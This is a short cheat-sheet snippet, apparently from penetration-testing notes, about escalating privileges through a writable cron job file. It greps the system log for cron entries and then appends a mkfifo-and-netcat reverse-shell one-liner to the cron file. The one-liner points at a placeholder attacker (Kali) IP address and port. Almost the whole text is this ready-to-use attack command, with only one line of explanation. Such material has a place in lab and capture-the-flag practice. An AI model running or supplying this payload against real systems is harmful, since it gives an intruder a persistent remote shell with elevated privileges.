NOTE: Ensure that the user has writable permission to the cronjob file
grep "CRON" /var/log/syslog
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <Kali IP Address> <Kali Port> >/tmp/f" >> <CronJob File Full Path>
Last updated 22 days ago